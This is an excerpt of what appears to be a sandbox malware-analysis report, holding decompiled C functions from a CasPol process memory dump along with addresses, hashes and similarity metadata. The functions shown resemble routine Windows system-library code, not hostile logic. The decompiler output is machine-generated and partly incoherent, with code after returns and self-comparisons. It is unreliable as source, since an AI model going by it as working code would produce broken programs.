				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E013B9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d0c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E013B2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                        0x013cef4b
                                                                        0x013cef4d
                                                                        0x013cef57
                                                                        0x013cf0bd
                                                                        0x013cf0c2
                                                                        0x013cf0d2
                                                                        0x013cf0d2
                                                                        0x013cf0c2
                                                                        0x013cef5d
                                                                        0x013cef5f
                                                                        0x013cef67
                                                                        0x013cef6a
                                                                        0x013cef6d
                                                                        0x013cef74
                                                                        0x013cef7f
                                                                        0x013cef82
                                                                        0x013cef82
                                                                        0x013cef86
                                                                        0x013cef88
                                                                        0x013cef8c
                                                                        0x013cef8f
                                                                        0x013cef8f
                                                                        0x013cef8f
                                                                        0x00000000
                                                                        0x013cef91
                                                                        0x013cef93
                                                                        0x013cefc4
                                                                        0x013cefc4
                                                                        0x013cefc4
                                                                        0x013cefca
                                                                        0x013cefd0
                                                                        0x013cf0a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cf0af
                                                                        0x0141bb06
                                                                        0x0141bb0a
                                                                        0x013cf0b5
                                                                        0x013cf0b5
                                                                        0x013cf0b5
                                                                        0x013cf0b5
                                                                        0x00000000
                                                                        0x013cefd6
                                                                        0x013cefd9
                                                                        0x013cf0de
                                                                        0x013cf0e2
                                                                        0x013cefdf
                                                                        0x013cefdf
                                                                        0x013cefdf
                                                                        0x013cefe5
                                                                        0x0141bafc
                                                                        0x0141bafc
                                                                        0x013cefe5
                                                                        0x013cefeb
                                                                        0x013cefed
                                                                        0x013cf00f
                                                                        0x013cf011
                                                                        0x013cf01a
                                                                        0x013cf01d
                                                                        0x013cf021
                                                                        0x013cf028
                                                                        0x013cf029
                                                                        0x013cf029
                                                                        0x013cf02c
                                                                        0x00000000
                                                                        0x013cf02c
                                                                        0x013ceff3
                                                                        0x013ceff9
                                                                        0x013cf0ea
                                                                        0x013cf0ed
                                                                        0x013cf0ef
                                                                        0x00000000
                                                                        0x013cf0ef
                                                                        0x013cf003
                                                                        0x0141bb12
                                                                        0x013cf045
                                                                        0x013cf049
                                                                        0x013cf051
                                                                        0x013cf09e
                                                                        0x013cf0a0
                                                                        0x013cf0a0
                                                                        0x013cf09e
                                                                        0x013cf053
                                                                        0x013cf064
                                                                        0x013cf064
                                                                        0x013cf06b
                                                                        0x0141bb1a
                                                                        0x0141bb1a
                                                                        0x013cf071
                                                                        0x013cf071
                                                                        0x013cf07d
                                                                        0x013cf082
                                                                        0x013cf08f
                                                                        0x013cf08f
                                                                        0x013cf009
                                                                        0x013cf00d
                                                                        0x00000000
                                                                        0x013cf00d
                                                                        0x013cefd0
                                                                        0x013cef97
                                                                        0x013cefa5
                                                                        0x013cefaa
                                                                        0x00000000
                                                                        0x013cefac
                                                                        0x013cefac
                                                                        0x013cefac
                                                                        0x00000000
                                                                        0x013cefb2
                                                                        0x013cf036
                                                                        0x013cf03a
                                                                        0x013cf040
                                                                        0x013cf090
                                                                        0x00000000
                                                                        0x013cf092
                                                                        0x013cf042
                                                                        0x00000000
                                                                        0x013cf042
                                                                        0x013cefb7
                                                                        0x013cefb9
                                                                        0x013cefbc
                                                                        0x013cefb0
                                                                        0x013cefb0
                                                                        0x00000000
                                                                        0x013cefbe
                                                                        0x013cefbe
                                                                        0x013cefc1
                                                                        0x00000000
                                                                        0x013cefc1
                                                                        0x013cefbc
                                                                        0x013cefaa
                                                                        0x013cef91

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                        • Instruction ID: 5b79f0a87954d21a6921b12b36a36d06227fcbc4ea2ab50d9d61c29e183737d0
                                                                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                        • Instruction Fuzzy Hash: BA510030A0425A9FEB25CB6CC0C07AEBFB6AF05B1CF2881ADC55593782C375AD88C751
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0148740D Relevance: .1, Instructions: 141COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E0148740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0140D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E013FF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L013D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L013D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E013FF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L013D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                        0x0148740d
                                                                        0x0148740d
                                                                        0x01487412
                                                                        0x01487413
                                                                        0x01487416
                                                                        0x01487418
                                                                        0x0148741c
                                                                        0x0148741f
                                                                        0x01487422
                                                                        0x01487422
                                                                        0x01487428
                                                                        0x0148742a
                                                                        0x0148742a
                                                                        0x01487451
                                                                        0x01487432
                                                                        0x0148744f
                                                                        0x0148744f
                                                                        0x00000000
                                                                        0x01487434
                                                                        0x01487438
                                                                        0x01487443
                                                                        0x01487517
                                                                        0x01487517
                                                                        0x0148751a
                                                                        0x01487535
                                                                        0x01487520
                                                                        0x01487527
                                                                        0x0148752c
                                                                        0x01487531
                                                                        0x01487533
                                                                        0x00000000
                                                                        0x01487533
                                                                        0x00000000
                                                                        0x01487531
                                                                        0x0148754b
                                                                        0x0148754f
                                                                        0x0148755c
                                                                        0x0148755c
                                                                        0x0148755f
                                                                        0x01487560
                                                                        0x01487561
                                                                        0x01487562
                                                                        0x01487563
                                                                        0x01487568
                                                                        0x0148756a
                                                                        0x0148756c
                                                                        0x0148756d
                                                                        0x0148756d
                                                                        0x0148756f
                                                                        0x01487572
                                                                        0x01487574
                                                                        0x01487577
                                                                        0x0148757c
                                                                        0x0148757f
                                                                        0x00000000
                                                                        0x01487551
                                                                        0x01487551
                                                                        0x01487551
                                                                        0x01487553
                                                                        0x01487553
                                                                        0x01487449
                                                                        0x01487449
                                                                        0x0148744c
                                                                        0x0148744c
                                                                        0x00000000
                                                                        0x0148744c
                                                                        0x01487443
                                                                        0x0148750e
                                                                        0x01487514
                                                                        0x01487514
                                                                        0x01487455
                                                                        0x01487469
                                                                        0x0148746d
                                                                        0x00000000
                                                                        0x01487473
                                                                        0x01487473
                                                                        0x01487476
                                                                        0x01487480
                                                                        0x01487484
                                                                        0x0148748e
                                                                        0x01487493
                                                                        0x01487493
                                                                        0x01487496
                                                                        0x01487499
                                                                        0x014874a1
                                                                        0x014874b1
                                                                        0x014874b5
                                                                        0x00000000
                                                                        0x014874bb
                                                                        0x014874c1
                                                                        0x014874c1
                                                                        0x014874c4
                                                                        0x014874c5
                                                                        0x014874c6
                                                                        0x014874c7
                                                                        0x014874c8
                                                                        0x014874cd
                                                                        0x00000000
                                                                        0x014874d3
                                                                        0x014874d3
                                                                        0x014874d6
                                                                        0x014874d8
                                                                        0x014874db
                                                                        0x014874dd
                                                                        0x014874e0
                                                                        0x014874e7
                                                                        0x014874ee
                                                                        0x014874ee
                                                                        0x014874f4
                                                                        0x014874f9
                                                                        0x00000000
                                                                        0x014874fb
                                                                        0x014874fb
                                                                        0x014874fd
                                                                        0x01487500
                                                                        0x01487503
                                                                        0x01487505
                                                                        0x01487505
                                                                        0x014874f9
                                                                        0x00000000
                                                                        0x014874cd
                                                                        0x014874b5
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                        • Instruction ID: 18a309237d46c2526dc5ae5646d71835806558d338a5435704fef8bb8480da4b
                                                                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                        • Instruction Fuzzy Hash: 0351A071600646EFDB16DF18C490A56BBB5FF45305F24C0BAE9089F222E371EA46CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E2990 Relevance: .1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E013E2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x148ff00);
				E0140D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1391664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E013FE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1391668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E014351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x139166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E013E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E013C6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E013E2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E013CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E013E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E013E2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E013E2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0140D0D1(_t62);
				goto L28;
			}





















                                                                        0x013e2990
                                                                        0x013e2992
                                                                        0x013e2997
                                                                        0x013e29a3
                                                                        0x013e29a6
                                                                        0x013e29ab
                                                                        0x013e29ad
                                                                        0x013e29b2
                                                                        0x01425c80
                                                                        0x013e29b8
                                                                        0x013e29b8
                                                                        0x013e29bb
                                                                        0x013e29c0
                                                                        0x013e29c5
                                                                        0x013e29c6
                                                                        0x013e29c6
                                                                        0x013e29cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e29cd
                                                                        0x013e29d0
                                                                        0x013e29d9
                                                                        0x013e29db
                                                                        0x013e29dd
                                                                        0x013e2a7f
                                                                        0x013e2a84
                                                                        0x013e2a87
                                                                        0x013e2a89
                                                                        0x01425ca1
                                                                        0x01425ca3
                                                                        0x00000000
                                                                        0x013e2a8f
                                                                        0x013e2a8f
                                                                        0x00000000
                                                                        0x013e2a8f
                                                                        0x00000000
                                                                        0x013e29e3
                                                                        0x013e29e3
                                                                        0x013e29e3
                                                                        0x00000000
                                                                        0x013e29e3
                                                                        0x013e29dd
                                                                        0x00000000
                                                                        0x013e29db
                                                                        0x013e29e6
                                                                        0x013e29e9
                                                                        0x013e29eb
                                                                        0x013e29ed
                                                                        0x013e29f3
                                                                        0x013e29f5
                                                                        0x013e29f8
                                                                        0x013e29fa
                                                                        0x013e2a97
                                                                        0x013e2a9a
                                                                        0x013e2a9d
                                                                        0x013e2add
                                                                        0x00000000
                                                                        0x013e2a9f
                                                                        0x013e2aa2
                                                                        0x013e2aa5
                                                                        0x013e2aa8
                                                                        0x013e2aab
                                                                        0x01425cab
                                                                        0x01425caf
                                                                        0x01425cc5
                                                                        0x01425cda
                                                                        0x01425cdc
                                                                        0x01425cdf
                                                                        0x01425ce5
                                                                        0x00000000
                                                                        0x01425ceb
                                                                        0x01425ced
                                                                        0x01425cee
                                                                        0x00000000
                                                                        0x01425cee
                                                                        0x01425cb1
                                                                        0x01425cb4
                                                                        0x01425cb9
                                                                        0x01425cbb
                                                                        0x00000000
                                                                        0x01425cbd
                                                                        0x01425cbd
                                                                        0x00000000
                                                                        0x01425cbd
                                                                        0x01425cbb
                                                                        0x013e2ab1
                                                                        0x013e2ab1
                                                                        0x013e2ac4
                                                                        0x013e2ac6
                                                                        0x013e2ac6
                                                                        0x00000000
                                                                        0x013e2ac6
                                                                        0x013e2aab
                                                                        0x00000000
                                                                        0x013e2a00
                                                                        0x013e2a09
                                                                        0x013e2a0e
                                                                        0x013e2a21
                                                                        0x013e2a24
                                                                        0x013e2a35
                                                                        0x013e2a3a
                                                                        0x013e2a3d
                                                                        0x013e2a42
                                                                        0x013e2a59
                                                                        0x013e2a59
                                                                        0x013e2a5c
                                                                        0x013e2a5f
                                                                        0x013e2a5f
                                                                        0x013e29fa
                                                                        0x013e29f3
                                                                        0x013e2a64
                                                                        0x013e2a64
                                                                        0x013e2a6b
                                                                        0x013e2a6b
                                                                        0x013e2a6d
                                                                        0x013e2a72
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c4fe1198771b4303b9f238aac32623da9f4ee1c9fe252dce655a33336e35156
                                                                        • Instruction ID: 2e47fed6830572cf9c1c16c94d2149714a59d1e6ba2110cf37505906660844dd
                                                                        • Opcode Fuzzy Hash: 8c4fe1198771b4303b9f238aac32623da9f4ee1c9fe252dce655a33336e35156
                                                                        • Instruction Fuzzy Hash: FB517C7190022ADFEF25DF59C844ADFBBB9BF48358F048119E904AB2A0D7318D92CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E4BAD Relevance: .1, Instructions: 131COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E013E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x14ad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E013BCC50(_t86);
					L11:
					return E013FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x14a8504
				E013D2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E013FFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E013FB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L013D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E013BCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x14a8504
								E013CFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E013E4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                        0x013e4bad
                                                                        0x013e4bbf
                                                                        0x013e4bc2
                                                                        0x013e4bc6
                                                                        0x013e4bcd
                                                                        0x013e4bd9
                                                                        0x014267fe
                                                                        0x01426800
                                                                        0x013e4ccc
                                                                        0x013e4ccd
                                                                        0x013e4cb7
                                                                        0x013e4cc9
                                                                        0x013e4cc9
                                                                        0x013e4bdf
                                                                        0x013e4be5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e4beb
                                                                        0x013e4bef
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e4bf5
                                                                        0x013e4bf9
                                                                        0x013e4c06
                                                                        0x013e4c0b
                                                                        0x013e4c17
                                                                        0x013e4c1c
                                                                        0x013e4c1f
                                                                        0x013e4c25
                                                                        0x013e4c33
                                                                        0x013e4c3d
                                                                        0x013e4c40
                                                                        0x013e4c43
                                                                        0x013e4c47
                                                                        0x013e4c4d
                                                                        0x013e4c53
                                                                        0x013e4c54
                                                                        0x013e4c55
                                                                        0x013e4c56
                                                                        0x013e4c5b
                                                                        0x013e4c5c
                                                                        0x013e4c63
                                                                        0x013e4c6b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426776
                                                                        0x01426784
                                                                        0x01426784
                                                                        0x0142679f
                                                                        0x014267a7
                                                                        0x014267af
                                                                        0x014267ce
                                                                        0x00000000
                                                                        0x014267b1
                                                                        0x014267b7
                                                                        0x014267b8
                                                                        0x014267c1
                                                                        0x014267d3
                                                                        0x014267d9
                                                                        0x014267dd
                                                                        0x013e4c94
                                                                        0x013e4c94
                                                                        0x013e4c98
                                                                        0x013e4c9c
                                                                        0x013e4ca3
                                                                        0x014267f4
                                                                        0x014267f4
                                                                        0x013e4cb5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e4cb5
                                                                        0x013e4c79
